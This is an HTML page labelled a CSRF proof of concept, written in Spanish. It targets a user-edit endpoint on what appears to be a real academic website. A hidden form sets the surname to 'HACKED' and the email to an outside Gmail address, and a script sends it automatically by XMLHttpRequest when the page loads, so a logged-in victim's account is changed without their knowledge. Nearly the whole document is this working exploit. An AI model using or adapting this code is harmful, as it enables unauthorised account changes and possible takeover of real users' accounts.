<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Modificar Usuario</title>
</head>
<body>

    <h2>CSRF PoC Page</h2>
    <img src="https://www.hola.com/horizon/landscape/d1eaad20c4c6-adobestock47432136.jpg" width="50%"/>
    <form id="autoSubmitForm" action="https://www.academiacientifica.com/academia/AcademiaWeb/editarUsuario/2639" method="post">
        <input type="hidden" name="_method" value="POST">

        <input type="hidden" name="data[AcademiaAlumno][nombre]" value="manuel" id="nombre" required>
       

        <input type="hidden" name="data[AcademiaAlumno][apellidos]" value="HACKED" id="apellidos" required>
       

        <input type="hidden" name="data[AcademiaAlumno][email]" value="manulop23@gmail.com" id="email" required>
    

        <input type="hidden" name="data[AcademiaAlumno][telefono]" id="telefono">
     

        <!-- <button type="submit">Actualizar</button> -->
    </form>


    <!-- <script>
        // Esta función se ejecutará cuando la página se cargue
        window.onload = function() {
            // Enviar el formulario automáticamente
            document.getElementById("autoSubmitForm").submit();
        }
    </script> -->
    
    <!-- Peticion asincrona para evitar el redirect -->
    <script>
        // Función que se ejecutará cuando la página se haya cargado
        window.onload = function() {
            // Crear un objeto FormData con los datos del formulario
            var formData = new FormData(document.getElementById("autoSubmitForm"));
            
            // Crear una solicitud AJAX (usando XMLHttpRequest)
            var xhr = new XMLHttpRequest();
            
            // Configurar la solicitud: POST a la URL destino
            xhr.open("POST", "https://www.academiacientifica.com/academia/AcademiaWeb/editarUsuario/2639", true);
            
            // Establecer lo que sucede cuando la solicitud termine
            xhr.onload = function() {
                if (xhr.status === 200) {
                    console.log(xhr.responseText); // Muestra la respuesta del servidor
                } else {
                    console.log("Error al enviar el formulario");
                } 
            };
            
            // Enviar la solicitud con los datos del formulario
            xhr.send(formData);
        };
    </script>

</body>
</html>
